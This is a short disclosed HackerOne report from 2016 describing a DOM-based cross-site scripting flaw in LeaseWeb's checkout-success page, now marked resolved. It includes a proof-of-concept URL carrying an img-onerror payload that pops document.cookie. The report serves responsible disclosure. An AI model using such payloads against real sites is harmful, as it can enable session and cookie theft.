DOM Based XSS in Checkout

Disclosed: 2016-02-26 11:14:00 By cliantech To leaseweb

Unknown

Vulnerability Details

Hey, This works in all browsers I suppose and regardless if the user is currently authenticated or not. Simply go over to : [https://www.leaseweb.com/checkout-success/16893#"><img src=x onerror=alert(document.cookie)>](https://www.leaseweb.com/checkout-success/16893#"><img src=x onerror=alert(document.cookie)>). Attached herewith is the screenshot. Thanks!

Actions

View on HackerOne

Report Stats

Report ID: 105688
State: Closed
Substate: resolved
Upvotes: 1

DOM Based XSS in Checkout

Vulnerability Details

Actions

Report Stats

Share this report